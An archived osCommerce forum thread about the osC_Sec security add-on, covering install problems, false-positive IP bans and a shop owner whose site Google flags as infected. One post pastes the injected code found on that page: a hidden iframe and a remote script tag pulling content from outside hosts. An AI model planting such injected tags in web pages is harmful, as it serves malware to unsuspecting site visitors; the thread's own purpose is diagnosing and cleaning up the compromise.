Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Oscommerce Security - Osc_Sec.php


Taipo

Recommended Posts

 

Other than that, did you notice any other anomolies when using $osCSpamTrap?

 

I only had spamtrap enabled in that 2.3.1 shop, and other than the attribute manager, nothing came to my attention. it's relatively new shop, but a few sales through there have been processed fine.

I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.

Link to comment
Share on other sites

  • Replies 598
  • Created
  • Last Reply

Hello

 

I installed the contribution on an old osc 2.2 version.

Took me some time to set it up as I had to make some changes but every thing looks fine.

 

I got 15 emails informing me of attempts to hack my site after only a couple of hours.

I also instaled the IP Trap contribution.

 

The problem is that sometimes I get this warning:

PHP Warning: Cookie names can not contain any of the following '=,; \t\r\n\013\014' in includes\osc_sec.php on line 1176

 

My systems runs on a dedicated server over IIS 7.5 windows 2008 Std R2 SP1 with PHP 5.2.17

 

 

thanks

Link to comment
Share on other sites

If you have $osCSpamTrap enabled, then you will probably need to disabled it for now. Also make sure you are using the very latest version of osC_Sec which I am sure you probably are.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Hi Taipo,

 

This morning I found an email from OSC SEC telling me (I Think) that it had banned one of my cron jobs that runs the googlefeeder.php file once per week, below is the top of the email:

 

This IP [ ] has been IP Trap banned on the http:// website by osC_Sec.php version 4.0[r9]

 

REASON FOR BAN: Request method [ ] should be in all uppercase letters.

 

Time of ban: Sat, 15 Oct 2011 23:00:02

 

.------------[ ALL $_GET VARIABLES ]-------------

#

# - /home/username/public_html/adminname/googlefeeder_php=NULL

#

`--------------------------------------------------------

 

.---------[ ALL $_POST FORM VARIABLES ]-------

#

# - No POST form data

#

 

Any Ideas?

 

Many Thanks

Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Link to comment
Share on other sites

In osc.php disable $nonGETPOSTReqs.

 

 
$nonGETPOSTReqs = 0;

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Thanks Taipo

Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Link to comment
Share on other sites

Hi Taipo - new user thanks so much to all you great and clever coders...

Installed OSC on new site v2.2 rc2

Seems to all go ok with the exception of adding the line

require_once( DIR_FS_CATALOG . 'includes/osc_sec.php' );

Includes app_top - line 45(as above) results in white screen. rem line 45 and all ok

 

Have been over and over cannot see anything else I have missed,

the other - isset not sure as have a few sec addons as suggested if they will conflict with each other or are doing the same job..

Currently this is what is in the application_top fie

Would be grateful if you can see any errors I have made by this inset, and if rem the line from Includes makes your addon non functional...

 

// set php_self in the local scope

if( !isset( $PHP_SELF ) ) {

if ( @phpversion() >= "5.0.0" && ( !ini_get("register_long_arrays" ) || @ini_get("register_long_arrays" ) == "0" || strtolower(@ini_get("register_long_arrays" ) ) == "off" ) ) $HTTP_SERVER_VARS = $_SERVER;

$PHP_SELF = ( ( ( strlen( ini_get('cgi.fix_pathinfo' ) ) > 0 ) && ( ( bool ) ini_get('cgi.fix_pathinfo' ) == false ) ) || !isset( $HTTP_SERVER_VARS['SCRIPT_NAME' ] ) ) ? basename( $HTTP_SERVER_VARS[ 'PHP_SELF' ] ) : basename( $HTTP_SERVER_VARS[ 'SCRIPT_NAME' ] );

}

// if (!isset($PHP_SELF)) $PHP_SELF = $HTTP_SERVER_VARS['PHP_SELF'];

$PHP_SELF = (((strlen(ini_get('cgi.fix_pathinfo')) > 0) && ((bool)ini_get('cgi.fix_pathinfo') == false)) || !isset($HTTP_SERVER_VARS['SCRIPT_NAME'])) ? basename($HTTP_SERVER_VARS['PHP_SELF']) : basename($HTTP_SERVER_VARS['SCRIPT_NAME']);

 

Many many thanks

Bea

Link to comment
Share on other sites

With the last piece of code you posted, either use the one in the osC_Sec package, or the one that you already had there, they both do the same thing.

 

With the 'white screen' issue, I would need to take a closer look at your site in order to see what is causing that. Can you PM me and we can work on it from there.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Thankyou - changing the path from

( DIR_FS_CATALOG . 'includes/osc_sec.php' );

to

full path to the osc_sec.php file (example below):

 

 

require_once( '/home/yourusername/public/catalog/includes/osc_sec.php' );

 

Seems to have done the trick - no errors no white screen

Many thanks.

Link to comment
Share on other sites

We have had google now lists our os commerce site as with malicious software.

 

This is within 6 weeks of having the site upgraded to the latest os commerce 2.3.1

 

No problem prior in 8 years !!!

 

Latest program seems to be nothing but problems and trouble !! costing $$$$$$$$ to correct

Link to comment
Share on other sites

What problems are you having with the 'latest program' Kevin?

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Hi Te Taipo. I am getting this only from Google Chrome !! this has only happened since upgrade by web guy to oscommerce 2.3.1; prior to that never had a problem !!

Unfortunately, Google has discovered harmful code on your site. Google users will see a warning page when they attempt to visit pages within this site.

 

After you have removed all harmful code from your site and addressed the underlying vulnerability that caused it to be compromised, you can request a review of your site.

Link to comment
Share on other sites

If you are 100% sure that all the malware has been removed then you need to do two more steps.

 

Firstly you need to secure your site so that the previous attack cannot be repeated.

 

I suggest that you install the addon called osC_Sec which will achieve this.

http://www.oscommerce.com/community/contributions,7834

 

 

Secondly once that is installed then log into Google Webmaster Tools and request a review of your site.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Te Taipo. did that reloaded site completely plus added os security 4 r9. result no change. this os commerce latest edition is a disaster for commercial usage . we are being told the latest os commerce 2;3.1 has so many faults its the worst programme ever and to have an new site with more reliable system ! particularly as one as a business can now get £500,000 fine for data lost !!

Link to comment
Share on other sites

Unfortunately I think the issue is more about the delay caused by the lack of staff at Google more than anything else. In the past, users who have been through similar experiences have had to wait weeks before Google gave their sites the all clear, for others it took days.

 

Google search and other services that list a warning about sites as containing malware; there does not seem to be any real time automated method of unlisting your site from that. It seems that the review is done manually by staff at Google, so that would cause an unecessary delay in getting your site the all clear.

 

The cause of course of the malware warning was not because of 2.3.1 but because of the major security hole in the older versions of osCommerce allowed attackers to install what are basically file managers of their own to gain complete access to your site. Because many millions of users had not updated their site to the latest version, or bothered to patch the hole, their sites were infected by these files.

 

As far as I am aware, there are no easily exploitable ways to get around the security in 2.3.1 that have been discovered so far. So then who is telling you that osCommerce 2.3.1 is the worst programme ever? I would have thought in terms of osCommerce, the outdated version you were using that got attacked would fit that criteria, because its not 2.3.1 that almost received the prize for the most hacked web system ever, but the earlier versions.

 

There are no free cart systems out in the wild that have ever been able to escape the attention of attackers. All have had at some point in time, their security bypassed, even systems that claim to have 'concrete' level security. The two bigger issues with osCommerce is that firstly there 'was' an initial lack of core developers keeping this system up to date, and secondly when the large security holes were discovered and 2.3 was released, most users did not update, and still have not updated.

 

That has opened the door for the attack networks to permanently enter in attack vectors aimed at the outdated versions of osCommerce, into their attack matrices. The fault lays squarely with the osCommerce users who took longer than a week or so to update their sites, as I stated, to date, being almost a year after officially fixing the issue, most are still intent on running outdated and unpatched versions of osCommerce. To attackers, this is the 'gift that keeps on giving'.

 

So you have done the right thing now and updated your site and fixed the security holes. Now you have to work on Google and any other services that have blacklisted your site.There is nothing more that I or anyone else can do to sort your issues. Now you have to work on Google and any other services that have blacklisted your site, and yes there are more than just Google.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

osC_Sec 4.1

Whats New?

- Fix to cookie logout code for $osCSpamTrap

- Addition code added to catch advanced database injection attempts aimed at bypassing web application whitelist filtering and webserver firewalls

 

* For those updating, replace the osc_sec.php file in includes/ with the one in this package.

 

New Install instructions: see the readme.htm, as per usual, all updates contain the complete package

 

Download From: http://www.oscommerce.com/community/contributions,7834

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

yes we did all the updates including the extra security . got site reloaded and cleared by google. only to have the same google warning signs + avast malware warning occur today . this os commerce latest is a disaster !!!!!!!!!!!!!!!!!!!!!!!!

Link to comment
Share on other sites

I think the clue to the problem you are having stems from something you said earlier...and I quote:

 

....this has only happened since upgrade by web guy to oscommerce 2.3.1;....

 

It appears to me that whoever upgraded your site to 2.3.1 did not remove all the malicious code from whatever earlier version you were using. If you are not able to do this yourself, you will need to find someone who actually knows what they are doing to go through your site and find all the bad code.

 

There is no way of protecting your site against attacks if malicious files were transferred from the old site to the new site, (therefore then still accessible to attackers) by this 'web guy'.

 

The issue is that there is an iFrame code that has been inserted into your sites header code, but finding and removing that is only the first part of the problem, the main issue is to find the file on the site, that was tranferred from the old site, which is allowing attackers to edit your sites files.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

<iframe src="http://drhousenews.orge.pl/iframe.php?id=25y8z097ife4v3uzkdkty169flx367g" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

 

 

 

 

 

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Yoshkar-Ola Love Gifts</title><script src=http://infocenc.com.br/js/></script><title></title>

 

 

 

we can see this but it does not show on any of the files on the site. and having uploaded a clean back up it made no difference at all !!

 

the above come from google chrome when right click for inspect elament

Link to comment
Share on other sites

If you have deleted all the files out of the site including htaccess files and then uploaded a fresh copy, then the offending piece of code is also in your backup. Which would further say to me that whoever did the clean up of your site did not do it properly.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

The iFrame code is not the hack itself, that type of appended or prepended code is only possible because there will be another file (shell code as it is often called) that has been added into your site or code (probably in the images directory but not always there) that allows attackers to add such things as iFrame script. Many that upgrade from the earlier obsolete versions of osCommerce inadvertently transfer these files from the old into the new, and yes they then end up in the backup files.

 

I assume your site was originally hacked before you upgraded, so that means your URL will be on a list of sites that have had these 'shell' codes added to them, so therefore the next level in the automated attacks merely goes looking for the same files and when found, carries out the same attack or even a different one using those files.

 

You will need to go through your backups and find any files that should not be there. In particular look in the image directory (which is usually transferred from the old to the new) and any other directory of files, or files, that were transferred from the old site to the new. If you are unable to do so yourself, then ask around here if you want, there are a number of people in these forums who do this thing quite professionally.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

[removed] this company did the changes in the os commerce 2.3.1 in September having contacted me from this forum !!

 

Actually:

( I assume your site was originally hacked before you upgraded ) in 10 years we did not ever have this problem or any think like it until the NEW OS COMMERCE upgrade!!

 

the new os commerce site was all live as should be on the 21st September. we downloaded all the files as backup on the 21st september , so today because of the problems on y-ola we seperated the alias site and made it live and uploaded the files of the 21st september backup to yoshkar-ola-gifts, this however is redirecting to :

latino-ru/merchants/index.php

then changes within 2 seconds to go to :

guide.opendns.com/main?ref=http%3A%2F%2Flatino-pay.ru%2Fmerchant%2Findex.php&w=1024&h=673

Link to comment
Share on other sites

Actually:

( I assume your site was originally hacked before you upgraded ) in 10 years we did not ever have this problem or any think like it until the NEW OS COMMERCE upgrade!!

 

osCommerce versions other than 2.3.1.....going back to when the admin login was added, have been vulnerable to a specific exploit that allows attackers to upload files into your site. So if you have been using osCommerce for 10 years, then your site has been vulnerable for a long time. The vulnerability did not become common knowledge until sometime last year, and those that upgraded their sites to 2.3, or secured their admin directories before the hack became common knowledge were spared the indignation of having attack files added to directories in their site/sites.

 

Assuming all the sites that are in your main website are all version 2.3.1, you need to go through your site and any other alias sites that come off of the main site, and find these files and remove them. If you are still running earlier versions of osCommerce in 'alias' sites then you will need to either properly secure them (protect the admin, add osC_Sec to all the sites) and clean them out of shellcode files, or upgrade them to 2.3.1 being careful not to transfer any of these shellcode files from the old into the new.

 

When you have done that, attackers will no longer be able to use those files to make changes to your main core site files - irrespective of whatever version you are using.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

http://www.flugelsoft.com this company did the changes in the os commerce 2.3.1 in September having contacted me from this forum !!

 

Have you been back in touch with them to let them know that your site has been hacked since they did some work on it?

 

There are a number of users here who are active in discussions in assisting people to clean up their hacked sites. I am not personally recommending anyone in particular, I am just pointing out that if you look around yourself you should be able to tell who is for real or not by the responses of others to their work.

 

You have posted a company name, if you have received bad service as you clearly have, and that user is not prepared to clean their mess up, then start another thread and name the user so that others will know to stay away from them in the future.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...